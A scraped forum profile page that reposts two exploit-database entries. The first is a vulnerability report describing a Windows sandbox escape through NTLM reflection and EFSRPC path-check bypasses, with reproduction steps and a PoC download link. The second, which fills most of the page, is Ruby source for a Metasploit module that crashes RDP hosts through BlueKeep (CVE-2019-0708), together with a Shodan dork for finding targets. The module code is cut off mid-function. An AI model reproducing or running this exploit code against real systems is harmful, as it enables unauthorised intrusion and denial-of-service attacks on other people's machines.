Anonymous

Administrators
  • Content Count

    22
  • Points

  • Joined

  • Last visited

Community Reputation

0 Neutral

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. VULNERABILITY DETAILS It's possible to use the NTLM reflection attack to escape a browser sandbox in the case where the sandboxed process is allowed to create TCP sockets. In particular, I was able to combine the issues mentioned below with a bug in Chromium to escape its sandbox. ## HTTP -> SMB NTLM reflection This is a long known attack that was described, for example, in https://bugs.chromium.org/p/project-zero/issues/detail?id=222. As far as I can tell, MS16-075 was supposed to to fix it by blocking attempts to reflect NTLM authentication operating in the same machine mode (not sure about the actual internal term for that). However, it's still possible to reflect NTLM authentication that works in the regular remote mode, and an attacker can force the parties to use the remote mode, for example, by clearing the NTLMSSP_NEGOTIATE_OEM_DOMAIN_SUPPLIED flag in the initial NEGOTIATE_MESSAGE message. In the actual exploit, a compromised sandboxed process acts as both a web server and an SMB client, and asks the browser to visit http://localhost:[fake_webserver_port]. The browser receives an NTLM authentication request and considers the `localhost` domain to be safe to automatically log on with the current user's credentials. The sandboxed process forwards the corresponding packets to the local SMB server. The problem here is that since the established session is considered remotely authenticated, it's not allowed to access administrative shares unless the browser process runs at the high integrity level. Therefore, another bug is required to gain file system access. ## Insufficient path check in EFSRPC The Encrypting File System Remote Protocol is a Remote Procedure Call interface that is used to manage data objects stored in an encrypted form. It supports backing up and restoring files over SMB, among other things. Functions like `EfsRpcOpenFileRaw` implement security checks, i.e., they forbid remote users to pass regular file paths. However, if the attacker passes a UNC path of the form `\\localhost\C$\...`, `lsass.exe` will initiate a new SMB connection while impersonating the calling user, but this time using the same machine mode authentication; therefore it will be permitted to access the C$ share. The exploit saves the payload on the user's disk (the easiest way might be just to force it to be auto-downloaded as a .txt file) and calls the EFSRPC methods to copy it as an .exe file to the user's Startup folder. There's also another path check bypass that has been found by James Forshaw. `EfsRpcOpenFileRaw` accepts file paths starting with `\\.\C:\...`, presumably thinking that it's a UNC path since it starts with two back-slashes. Please note that this variant also works in the case where a regular user's credentials are relayed to another machine in a domain, so it might have wider security implications. It's also worth mentioning that the `efsrpc` named pipe might not be enabled by default, but the same RPC endpoint is available on the `lsass` named pipe with UUID [c681d488-d850-11d0-8c52-00c04fd90f7e]. REPRODUCTION CASE The proof-of-concept is based on [impacket](https://github.com/SecureAuthCorp/impacket/). It's a collection of Python classes that supports working with SMB and MSRPC. 1. Run `start.cmd`, which downloads impacket from Github, applies the patch, and starts the server. 2. Open http://localhost/ in a Chromium-based browser. 3. You should see a new .exe file appearing on your desktop. VERSION Microsoft Windows [Version 10.0.17134.648] REFERENCES https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nlmp/b38c36ed-2804-4868-a9ff-8dd3182128e4 https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31 Proof of Concept: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47115.zip
  2. # Exploit Title: Bluekeep Denial of Service (metasploit module) # Shodan Dork: port:3389 # Date: 07/14/2019 # Exploit Author: RAMELLA Sebastien (https://github.com/mekhalleh/) # Vendor Homepage: https://microsoft.com # Version: all affected RDP services by cve-2019-0708 # Tested on: Windows XP (32-bits) / Windows 7 (64-bits) # CVE : 2019-0708 # I just modified the initial metasploit module for this vuln to produce a denial of service attack. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary Rank = NormalRanking include Msf::Auxiliary::Dos include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE', 'Description' => %q{ This module checks a range of hosts for the CVE-2019-0708 vulnerability by binding the MS_T120 channel outside of its normal slot and sending DoS packets. }, 'Author' => [ 'National Cyber Security Centre', # Discovery 'JaGoTu', # Module 'zerosum0x0', # Module 'Tom Sellers', # TLS support and documented packets 'RAMELLA Sebastien' # Denial of service module ], 'References' => [ [ 'CVE', '2019-0708' ], [ 'URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708' ] ], 'DisclosureDate' => '2019-05-14', 'License' => MSF_LICENSE, 'Notes' => { 'Stability' => [ CRASH_OS_DOWN ], 'AKA' => ['BlueKeep'] } )) register_options( [ OptAddress.new('RDP_CLIENT_IP', [ true, 'The client IPv4 address to report during connection', '192.168.0.100']), OptString.new('RDP_CLIENT_NAME', [ false, 'The client computer name to report during connection', 'rdesktop']), OptString.new('RDP_DOMAIN', [ false, 'The client domain name to report during connection', '']), OptString.new('RDP_USER', [ false, 'The username to report during connection.']), OptAddressRange.new("RHOSTS", [ true, 'Target address, address range or CIDR identifier']), OptInt.new('RPORT', [true, 'The target TCP port on which the RDP protocol response', 3389]) ] ) end # ------------------------------------------------------------------------- # def bin_to_hex(s) return(s.each_byte.map { | b | b.to_s(16).rjust(2, '0') }.join) end def bytes_to_bignum(bytesIn, order = "little") bytes = bin_to_hex(bytesIn) if(order == "little") bytes = bytes.scan(/../).reverse.join('') end s = "0x" + bytes return(s.to_i(16)) end ## https://www.ruby-forum.com/t/integer-to-byte-string-speed-improvements/67110 def int_to_bytestring(daInt, num_chars = nil) unless(num_chars) bits_needed = Math.log(daInt) / Math.log(2) num_chars = (bits_needed / 8.0).ceil end if(pack_code = { 1 => 'C', 2 => 'S', 4 => 'L' }[ num_chars ]) [daInt].pack(pack_code) else a = (0..(num_chars)).map{ | i | (( daInt >> i*8 ) & 0xFF ).chr }.join a[0..-2] # Seems legit lol! end end def open_connection() begin connect() sock.setsockopt(::Socket::IPPROTO_TCP, ::Socket::TCP_NODELAY, 1) rescue ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e vprint_error("Connection error: #{e.message}") return(false) end return(true) end def rsa_encrypt(bignum, rsexp, rsmod) return((bignum ** rsexp) % rsmod) end # ------------------------------------------------------------------------- # ## Used to abruptly abort scanner for a given host. class RdpCommunicationError < StandardError end ## Define standard RDP constants. class RDPConstants PROTOCOL_RDP = 0 end DEFAULT_CHANNELS_DEFS = "\x04\x00\x00\x00" + # channelCount: 4 ## Channels definitions consist of a name (8 bytes) and options flags ## (4 bytes). Names are up to 7 ANSI characters with null termination. "\x72\x64\x70\x73\x6e\x64\x00\x00" + # rdpsnd "\x0f\x00\x00\xc0" + "\x63\x6c\x69\x70\x72\x64\x72\x00" + # cliprdr "\x00\x00\xa0\xc0" + "\x64\x72\x64\x79\x6e\x76\x63" + # drdynvc "\x00\x00\x00\x80\xc0" + "\x4d\x53\x5f\x54\x31\x32\x30" + # MS_T120 "\x00\x00\x00\x00\x00" ## Builds x.224 Data (DT) TPDU - Section 13.7 def rdp_build_data_tpdu(data) tpkt_length = data.length + 7 "\x03\x00" + # TPKT Header version 03, reserved 0 [tpkt_length].pack("S>") + # TPKT length "\x02\xf0" + # X.224 Data TPDU (2 bytes) "\x80" + # X.224 End Of Transmission (0x80) data end ## Build the X.224 packet, encrypt with Standard RDP Security as needed. ## Default channel_id = 0x03eb = 1003. def rdp_build_pkt(data, rc4enckey = nil, hmackey = nil, channel_id = "\x03\xeb", client_info = false, rdp_sec = true) flags = 0 flags |= 0b1000 if(rdp_sec) # Set SEC_ENCRYPT flags |= 0b1000000 if(client_info) # Set SEC_INFO_PKT pdu = "" ## TS_SECURITY_HEADER - 2.2.8.1.1.2.1 ## Send when the packet is encrypted w/ Standard RDP Security and in all Client Info PDUs. if(client_info || rdp_sec) pdu << [flags].pack("S<") # flags "\x48\x00" = SEC_INFO_PKT | SEC_ENCRYPT pdu << "\x00\x00" # flagsHi end if(rdp_sec) ## Encrypt the payload with RDP Standard Encryption. pdu << rdp_hmac(hmackey, data)[0..7] pdu << rdp_rc4_crypt(rc4enckey, data) else pdu << data end user_data_len = pdu.length udl_with_flag = 0x8000 | user_data_len pkt = "\x64" # sendDataRequest pkt << "\x00\x08" # intiator userId (TODO: for a functional client this isn't static) pkt << channel_id # channelId pkt << "\x70" # dataPriority pkt << [udl_with_flag].pack("S>") pkt << pdu return(rdp_build_data_tpdu(pkt)) end ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/73d01865-2eae-407f-9b2c-87e31daac471 ## Share Control Header - TS_SHARECONTROLHEADER - 2.2.8.1.1.1.1 def rdp_build_share_control_header(type, data, channel_id = "\xf1\x03") total_len = data.length + 6 return( [total_len].pack("S<") + # totalLength - includes all headers [type].pack("S<") + # pduType - flags 16 bit, unsigned channel_id + # PDUSource: 0x03f1 = 1009 data ) end ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/4b5d4c0d-a657-41e9-9c69-d58632f46d31 ## Share Data Header - TS_SHAREDATAHEADER - 2.2.8.1.1.1.2 def rdp_build_share_data_header(type, data) uncompressed_len = data.length + 4 return( "\xea\x03\x01\x00" + # shareId: 66538 "\x00" + # pad1 "\x01" + # streamID: 1 [uncompressed_len].pack("S<") + # uncompressedLength - 16 bit, unsigned int [type].pack("C") + # pduType2 - 8 bit, unsigned int - 2.2.8.1.1.2 "\x00" + # compressedType: 0 "\x00\x00" + # compressedLength: 0 data ) end ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/6c074267-1b32-4ceb-9496-2eb941a23e6b ## Virtual Channel PDU 2.2.6.1 def rdp_build_virtual_channel_pdu(flags, data) data_len = data.length return( [data_len].pack("L<") + # length [flags].pack("L<") + # flags data ) end def rdp_calculate_rc4_keys(client_random, server_random) ## preMasterSecret = First192Bits(ClientRandom) + First192Bits(ServerRandom). preMasterSecret = client_random[0..23] + server_random[0..23] ## PreMasterHash(I) = SaltedHash(preMasterSecret, I) ## MasterSecret = PreMasterHash(0x41) + PreMasterHash(0x4242) + PreMasterHash(0x434343). masterSecret = rdp_salted_hash(preMasterSecret, "A", client_random,server_random) + rdp_salted_hash(preMasterSecret, "BB", client_random, server_random) + rdp_salted_hash(preMasterSecret, "CCC", client_random, server_random) ## MasterHash(I) = SaltedHash(MasterSecret, I) ## SessionKeyBlob = MasterHash(0x58) + MasterHash(0x5959) + MasterHash(0x5A5A5A). sessionKeyBlob = rdp_salted_hash(masterSecret, "X", client_random, server_random) + rdp_salted_hash(masterSecret, "YY", client_random, server_random) + rdp_salted_hash(masterSecret, "ZZZ", client_random, server_random) ## InitialClientDecryptKey128 = FinalHash(Second128Bits(SessionKeyBlob)). initialClientDecryptKey128 = rdp_final_hash(sessionKeyBlob[16..31], client_random, server_random) ## InitialClientEncryptKey128 = FinalHash(Third128Bits(SessionKeyBlob)). initialClientEncryptKey128 = rdp_final_hash(sessionKeyBlob[32..47], client_random, server_random) macKey = sessionKeyBlob[0..15] return initialClientEncryptKey128, initialClientDecryptKey128, macKey, sessionKeyBlob end def rdp_connection_initiation() ## Code to check if RDP is open or not. vprint_status("Verifying RDP protocol...") vprint_status("Attempting to connect using RDP security") rdp_send(pdu_negotiation_request(datastore['RDP_USER'], RDPConstants::PROTOCOL_RDP)) received = sock.get_once(-1, 5) ## TODO: fix it. if (received and received.include? "\x00\x12\x34\x00") return(true) end return(false) end ## FinalHash(K) = MD5(K + ClientRandom + ServerRandom). def rdp_final_hash(k, client_random_bytes, server_random_bytes) md5 = Digest::MD5.new md5 << k md5 << client_random_bytes md5 << server_random_bytes return([md5.hexdigest].pack("H*")) end ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/7c61b54e-f6cd-4819-a59a-daf200f6bf94 ## mac_salt_key = "W\x13\xc58\x7f\xeb\xa9\x10*\x1e\xddV\x96\x8b[d" ## data_content = "\x12\x00\x17\x00\xef\x03\xea\x03\x02\x00\x00\x01\x04\x00$\x00\x00\x00" ## hmac = rdp_hmac(mac_salt_key, data_content) # hexlified: "22d5aeb486994a0c785dc929a2855923". def rdp_hmac(mac_salt_key, data_content) sha1 = Digest::SHA1.new md5 = Digest::MD5.new pad1 = "\x36" * 40 pad2 = "\x5c" * 48 sha1 << mac_salt_key sha1 << pad1 sha1 << [data_content.length].pack('<L') sha1 << data_content md5 << mac_salt_key md5 << pad2 md5 << [sha1.hexdigest].pack("H*") return([md5.hexdigest].pack("H*")) end ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/927de44c-7fe8-4206-a14f-e5517dc24b1c ## Parse Server MCS Connect Response PUD - 2.2.1.4 def rdp_parse_connect_response(pkt) ptr = 0 rdp_pkt = pkt[0x49..pkt.length] while(ptr < rdp_pkt.length) header_type = rdp_pkt[ptr..ptr + 1] header_length = rdp_pkt[ptr + 2..ptr + 3].unpack("S<")[0] # vprint_status("header: #{bin_to_hex(header_type)}, len: #{header_length}") if(header_type == "\x02\x0c") # vprint_status("Security header") server_random = rdp_pkt[ptr + 20..ptr + 51] public_exponent = rdp_pkt[ptr + 84..ptr + 87] modulus = rdp_pkt[ptr + 88..ptr + 151] # vprint_status("modulus_old: #{bin_to_hex(modulus)}") rsa_magic = rdp_pkt[ptr + 68..ptr + 71] if(rsa_magic != "RSA1") print_error("Server cert isn't RSA, this scenario isn't supported (yet).") raise RdpCommunicationError end # vprint_status("RSA magic: #{rsa_magic}") bitlen = rdp_pkt[ptr + 72..ptr + 75].unpack("L<")[0] - 8 vprint_status("RSA #{bitlen}-bits") modulus = rdp_pkt[ptr + 88..ptr + 87 + bitlen] # vprint_status("modulus_new: #{bin_to_hex(modulus)}") end ptr += header_length end # vprint_status("SERVER_MODULUS: #{bin_to_hex(modulus)}") # vprint_status("SERVER_EXPONENT: #{bin_to_hex(public_exponent)}") # vprint_status("SERVER_RANDOM: #{bin_to_hex(server_random)}") rsmod = bytes_to_bignum(modulus) rsexp = bytes_to_bignum(public_exponent) rsran = bytes_to_bignum(server_random) vprint_status("MODULUS: #{bin_to_hex(modulus)} - #{rsmod.to_s}") vprint_status("EXPONENT: #{bin_to_hex(public_exponent)} - #{rsexp.to_s}") vprint_status("SVRANDOM: #{bin_to_hex(server_random)} - #{rsran.to_s}") return rsmod, rsexp, rsran, server_random, bitlen end def rdp_rc4_crypt(rc4obj, data) rc4obj.encrypt(data) end ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/705f9542-b0e3-48be-b9a5-cf2ee582607f ## SaltedHash(S, I) = MD5(S + SHA(I + S + ClientRandom + ServerRandom)) def rdp_salted_hash(s_bytes, i_bytes, client_random_bytes, server_random_bytes) sha1 = Digest::SHA1.new md5 = Digest::MD5.new sha1 << i_bytes sha1 << s_bytes sha1 << client_random_bytes sha1 << server_random_bytes md5 << s_bytes md5 << [sha1.hexdigest].pack("H*") return([md5.hexdigest].pack("H*")) end def rdp_recv() buffer_1 = sock.get_once(4, 5) raise RdpCommunicationError unless buffer_1 # nil due to a timeout buffer_2 = sock.get_once(buffer_1[2..4].unpack("S>")[0], 5) raise RdpCommunicationError unless buffer_2 # nil due to a timeout vprint_status("Received data: #{bin_to_hex(buffer_1 + buffer_2)}") return(buffer_1 + buffer_2) end def rdp_send(data) vprint_status("Send data: #{bin_to_hex(data)}") sock.put(data) end def rdp_sendrecv(data) rdp_send(data) return(rdp_recv()) end # ------------------------------------------------------------------------- # ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/18a27ef9-6f9a-4501-b000-94b1fe3c2c10 ## Client X.224 Connect Request PDU - 2.2.1.1 def pdu_negotiation_request(user_name = "", requested_protocols = RDPConstants::PROTOCOL_RDP) ## Blank username is valid, nil is random. user_name = Rex::Text.rand_text_alpha(12) if(user_name.nil?) tpkt_len = user_name.length + 38 x224_len = user_name.length + 33 return( "\x03\x00" + # TPKT Header version 03, reserved 0 [tpkt_len].pack("S>") + # TPKT length: 43 [x224_len].pack("C") + # X.224 LengthIndicator "\xe0" + # X.224 Type: Connect Request "\x00\x00" + # dst reference "\x00\x00" + # src reference "\x00" + # class and options "\x43\x6f\x6f\x6b\x69\x65\x3a\x20\x6d\x73\x74\x73\x68\x61\x73\x68\x3d" + # cookie - literal 'Cookie: mstshash=' user_name + # Identifier "username" "\x0d\x0a" + # cookie terminator "\x01\x00" + # Type: RDP Negotiation Request (0x01) "\x08\x00" + # Length [requested_protocols].pack('L<') # requestedProtocols ) end # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/db6713ee-1c0e-4064-a3b3-0fac30b4037b def pdu_connect_initial(selected_proto = RDPConstants::PROTOCOL_RDP, host_name = "rdesktop", channels_defs = DEFAULT_CHANNELS_DEFS) ## After negotiating TLS or NLA the connectInitial packet needs to include the ## protocol selection that the server indicated in its negotiation response. ## TODO: If this is pulled into an RDP library then the channel list likely ## needs to be build dynamically. For example, MS_T120 likely should only ## ever be sent as part of checks for CVE-2019-0708. ## build clientName - 12.2.1.3.2 Client Core Data (TS_UD_CS_CORE) ## 15 characters + null terminator, converted to unicode ## fixed length - 32 characters total name_unicode = Rex::Text.to_unicode(host_name[0..14], type = 'utf-16le') name_unicode += "\x00" * (32 - name_unicode.length) pdu = "\x7f\x65" + # T.125 Connect-Initial (BER: Application 101) "\x82\x01\xb2" + # Length (BER: Length) "\x04\x01\x01" + # CallingDomainSelector: 1 (BER: OctetString) "\x04\x01\x01" + # CalledDomainSelector: 1 (BER: OctetString) "\x01\x01\xff" + # UpwaredFlag: True (BER: boolean) ## Connect-Initial: Target Parameters "\x30\x19" + # TargetParamenters (BER: SequenceOf) ## *** not sure why the BER encoded Integers below have 2 byte values instead of one *** "\x02\x01\x22\x02\x01\x02\x02\x01\x00\x02\x01\x01\x02\x01\x00\x02\x01\x01\x02\x02\xff\xff\x02\x01\x02" + ## Connect-Intial: Minimum Parameters "\x30\x19" + # MinimumParameters (BER: SequencOf) "\x02\x01\x01\x02\x01\x01\x02\x01\x01\x02\x01\x01\x02\x01\x00\x02\x01\x01\x02\x02\x04\x20\x02\x01\x02" + ## Connect-Initial: Maximum Parameters "\x30\x1c" + # MaximumParameters (BER: SequencOf) "\x02\x02\xff\xff\x02\x02\xfc\x17\x02\x02\xff\xff\x02\x01\x01\x02\x01\x00\x02\x01\x01\x02\x02\xff\xff\x02\x01\x02" + ## Connect-Initial: UserData "\x04\x82\x01\x51" + # UserData, length 337 (BER: OctetString) ## T.124 GCC Connection Data (ConnectData) - PER Encoding used "\x00\x05" + # object length "\x00\x14\x7c\x00\x01" + # object: OID 0.0.20.124.0.1 = Generic Conference Control "\x81\x48" + # Length: ??? (Connect PDU) "\x00\x08\x00\x10\x00\x01\xc0\x00" + # T.124 Connect PDU, Conference name 1 "\x44\x75\x63\x61" + # h221NonStandard: 'Duca' (client-to-server H.221 key) "\x81\x3a" + # Length: ??? (T.124 UserData section) ## Client MCS Section - 2.2.1.3 "\x01\xc0" + # clientCoreData (TS_UD_CS_CORE) header - 2.2.1.3.2 "\xea\x00" + # Length: 234 (includes header) "\x0a\x00\x08\x00" + # version: 8.1 (RDP 5.0 -> 8.1) "\x80\x07" + # desktopWidth: 1920 "\x38\x04" + # desktopHeigth: 1080 "\x01\xca" + # colorDepth: 8 bpp "\x03\xaa" + # SASSequence: 43523 "\x09\x04\x00\x00" + # keyboardLayout: 1033 (English US) "\xee\x42\x00\x00" + # clientBuild: ???? [name_unicode].pack("a*") + # clientName "\x04\x00\x00\x00" + # keyboardType: 4 (IBMEnhanced 101 or 102) "\x00\x00\x00\x00" + # keyboadSubtype: 0 "\x0c\x00\x00\x00" + # keyboardFunctionKey: 12 "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + # imeFileName (64 bytes) "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x01\xca" + # postBeta2ColorDepth: 8 bpp "\x01\x00" + # clientProductID: 1 "\x00\x00\x00\x00" + # serialNumber: 0 "\x18\x00" + # highColorDepth: 24 bpp "\x0f\x00" + # supportedColorDepths: flag (24 bpp | 16 bpp | 15 bpp) "\xaf\x07" + # earlyCapabilityFlags "\x62\x00\x63\x00\x37\x00\x38\x00\x65\x00\x66\x00\x36\x00\x33\x00" + # clientDigProductID (64 bytes) "\x2d\x00\x39\x00\x64\x00\x33\x00\x33\x00\x2d\x00\x34\x00\x31\x00" + "\x39\x38\x00\x38\x00\x2d\x00\x39\x00\x32\x00\x63\x00\x66\x00\x2d" + "\x00\x00\x31\x00\x62\x00\x32\x00\x64\x00\x61\x00\x42\x42\x42\x42" + "\x07" + # connectionType: 7 "\x00" + # pad1octet ## serverSelectedProtocol - After negotiating TLS or CredSSP this value ## must match the selectedProtocol value from the server's Negotiate ## Connection confirm PDU that was sent before encryption was started. [selected_proto].pack('L<') + # "\x01\x00\x00\x00" "\x56\x02\x00\x00" + "\x50\x01\x00\x00" + "\x00\x00" + "\x64\x00\x00\x00" + "\x64\x00\x00\x00" + "\x04\xc0" + # clientClusterdata (TS_UD_CS_CLUSTER) header - 2.2.1.3.5 "\x0c\x00" + # Length: 12 (includes header) "\x15\x00\x00\x00" + # flags (REDIRECTION_SUPPORTED | REDIRECTION_VERSION3) "\x00\x00\x00\x00" + # RedirectedSessionID "\x02\xc0" + # clientSecuritydata (TS_UD_CS_SEC) header - 2.2.1.3.3 "\x0c\x00" + # Length: 12 (includes header) "\x1b\x00\x00\x00" + # encryptionMethods: 3 (40 bit | 128 bit) "\x00\x00\x00\x00" + # extEncryptionMethods (French locale only) "\x03\xc0" + # clientNetworkData (TS_UD_CS_NET) - 2.2.1.3.4 "\x38\x00" + # Length: 56 (includes header) channels_defs ## Fix. for packet modification. ## T.125 Connect-Initial size_1 = [pdu.length - 5].pack("s") # Length (BER: Length) pdu[3] = size_1[1] pdu[4] = size_1[0] ## Connect-Initial: UserData size_2 = [pdu.length - 102].pack("s") # UserData, length (BER: OctetString) pdu[100] = size_2[1] pdu[101] = size_2[0] ## T.124 GCC Connection Data (ConnectData) - PER Encoding used size_3 = [pdu.length - 111].pack("s") # Length (Connect PDU) pdu[109] = "\x81" pdu[110] = size_3[0] size_4 = [pdu.length - 125].pack("s") # Length (T.124 UserData section) pdu[123] = "\x81" pdu[124] = size_4[0] ## Client MCS Section - 2.2.1.3 size_5 = [pdu.length - 383].pack("s") # Length (includes header) pdu[385] = size_5[0] rdp_build_data_tpdu(pdu) end ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/9cde84cd-5055-475a-ac8b-704db419b66f ## Client Security Exchange PDU - 2.2.1.10 def pdu_security_exchange(rcran, rsexp, rsmod, bitlen) encrypted_rcran_bignum = rsa_encrypt(rcran, rsexp, rsmod) encrypted_rcran = int_to_bytestring(encrypted_rcran_bignum) bitlen += 8 # Pad with size of TS_SECURITY_PACKET header userdata_length = 8 + bitlen userdata_length_low = userdata_length & 0xFF userdata_length_high = userdata_length / 256 flags = 0x80 | userdata_length_high pdu = "\x64" + # T.125 sendDataRequest "\x00\x08" + # intiator userId "\x03\xeb" + # channelId = 1003 "\x70" + # dataPriority = high, segmentation = begin | end [flags].pack("C") + [userdata_length_low].pack("C") + # UserData length # TS_SECURITY_PACKET - 2.2.1.10.1 "\x01\x00" + # securityHeader flags "\x00\x00" + # securityHeader flagsHi [bitlen].pack("L<") + # TS_ length encrypted_rcran + # encryptedClientRandom - 64 bytes "\x00\x00\x00\x00\x00\x00\x00\x00" # 8 bytes rear padding (always present) return(rdp_build_data_tpdu(pdu)) end ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/04c60697-0d9a-4afd-a0cd-2cc133151a9c ## Client MCS Erect Domain Request PDU - 2.2.1.5 def pdu_erect_domain_request() pdu = "\x04" + # T.125 ErectDomainRequest "\x01\x00" + # subHeight - length 1, value 0 "\x01\x00" # subInterval - length 1, value 0 return(rdp_build_data_tpdu(pdu)) end ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/f5d6a541-9b36-4100-b78f-18710f39f247\ ## Client MCS Attach User Request PDU - 2.2.1.6 def pdu_attach_user_request() pdu = "\x28" # T.125 AttachUserRequest return(rdp_build_data_tpdu(pdu)) end ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/64564639-3b2d-4d2c-ae77-1105b4cc011b ## Client MCS Channel Join Request PDU -2.2.1.8 def pdu_channel_request(user1, channel_id) pdu = "\x38" + [user1, channel_id].pack("nn") # T.125 ChannelJoinRequest return(rdp_build_data_tpdu(pdu)) end ## https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/772d618e-b7d6-4cd0-b735-fa08af558f9d ## TS_INFO_PACKET - 2.2.1.11.1.1 def pdu_client_info(user_name, domain_name = "", ip_address = "") ## Max. len for 4.0/6.0 servers is 44 bytes including terminator. ## Max. len for all other versions is 512 including terminator. ## We're going to limit to 44 (21 chars + null -> unicode) here. ## Blank username is valid, nil = random. user_name = Rex::Text.rand_text_alpha(10) if user_name.nil? user_unicode = Rex::Text.to_unicode(user_name[0..20], type = 'utf-16le') uname_len = user_unicode.length ## Domain can can be, and for rdesktop typically is, empty. ## Max. len for 4.0/5.0 servers is 52 including terminator. ## Max. len for all other versions is 512 including terminator. ## We're going to limit to 52 (25 chars + null -> unicode) here. domain_unicode = Rex::Text.to_unicode(domain_name[0..24], type = 'utf-16le') domain_len = domain_unicode.length ## This address value is primarily used to reduce the fields by which this ## module can be fingerprinted. It doesn't show up in Windows logs. ## clientAddress + null terminator ip_unicode = Rex::Text.to_unicode(ip_address, type = 'utf-16le') + "\x00\x00" ip_len = ip_unicode.length pdu = "\xa1\xa5\x09\x04" + "\x09\x04\xbb\x47" + # CodePage "\x03\x00\x00\x00" + # flags - INFO_MOUSE, INFO_DISABLECTRLALTDEL, INFO_UNICODE, INFO_MAXIMIZESHELL, INFO_ENABLEWINDOWSKEY [domain_len].pack("S<") + # cbDomain (length value) - EXCLUDES null terminator [uname_len].pack("S<") + # cbUserName (length value) - EXCLUDES null terminator "\x00\x00" + # cbPassword (length value) "\x00\x00" + # cbAlternateShell (length value) "\x00\x00" + # cbWorkingDir (length value) [domain_unicode].pack("a*") + # Domain "\x00\x00" + # Domain null terminator, EXCLUDED from value of cbDomain [user_unicode].pack("a*") + # UserName "\x00\x00" + # UserName null terminator, EXCLUDED FROM value of cbUserName "\x00\x00" + # Password - empty "\x00\x00" + # AlternateShell - empty ## TS_EXTENDED_INFO_PACKET - 2.2.1.11.1.1.1 "\x02\x00" + # clientAddressFamily - AF_INET - FIXFIX - detect and set dynamically [ip_len].pack("S<") + # cbClientAddress (length value) - INCLUDES terminator ... for reasons. [ip_unicode].pack("a*") + # clientAddress (unicode + null terminator (unicode) "\x3c\x00" + # cbClientDir (length value): 60 "\x43\x00\x3a\x00\x5c\x00\x57\x00\x49\x00\x4e\x00\x4e\x00\x54\x00" + # clientDir - 'C:\WINNT\System32\mstscax.dll' + null terminator "\x5c\x00\x53\x00\x79\x00\x73\x00\x74\x00\x65\x00\x6d\x00\x33\x00" + "\x32\x00\x5c\x00\x6d\x00\x73\x00\x74\x00\x73\x00\x63\x00\x61\x00" + "\x78\x00\x2e\x00\x64\x00\x6c\x00\x6c\x00\x00\x00" + ## clientTimeZone - TS_TIME_ZONE struct - 172 bytes ## These are the default values for rdesktop "\xa4\x01\x00\x00" + # Bias ## StandardName - 'GTB,normaltid' "\x4d\x00\x6f\x00\x75\x00\x6e\x00\x74\x00\x61\x00\x69\x00\x6e\x00" + "\x20\x00\x53\x00\x74\x00\x61\x00\x6e\x00\x64\x00\x61\x00\x72\x00" + "\x64\x00\x20\x00\x54\x00\x69\x00\x6d\x00\x65\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x0b\x00\x00\x00\x01\x00\x02\x00\x00\x00\x00\x00\x00\x00" + # StandardDate "\x00\x00\x00\x00" + # StandardBias ## DaylightName - 'GTB,sommartid' "\x4d\x00\x6f\x00\x75\x00\x6e\x00\x74\x00\x61\x00\x69\x00\x6e\x00" + "\x20\x00\x44\x00\x61\x00\x79\x00\x6c\x00\x69\x00\x67\x00\x68\x00" + "\x74\x00\x20\x00\x54\x00\x69\x00\x6d\x00\x65\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x03\x00\x00\x00\x02\x00\x02\x00\x00\x00\x00\x00\x00\x00" + # DaylightDate "\xc4\xff\xff\xff" + # DaylightBias "\x01\x00\x00\x00" + # clientSessionId "\x06\x00\x00\x00" + # performanceFlags "\x00\x00" + # cbAutoReconnectCookie "\x64\x00\x00\x00" return(pdu) end # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/4e9722c3-ad83-43f5-af5a-529f73d88b48 # Confirm Active PDU Data - TS_CONFIRM_ACTIVE_PDU - 2.2.1.13.2.1 def pdu_client_confirm_active() pdu = "\xea\x03\x01\x00" + # shareId: 66538 "\xea\x03" + # originatorId "\x06\x00" + # lengthSourceDescriptor: 6 "\x3e\x02" + # lengthCombinedCapabilities: ??? "\x4d\x53\x54\x53\x43\x00" + # SourceDescriptor: 'MSTSC' "\x17\x00" + # numberCapabilities: 23 "\x00\x00" + # pad2Octets "\x01\x00" + # capabilitySetType: 1 - TS_GENERAL_CAPABILITYSET "\x18\x00" + # lengthCapability: 24 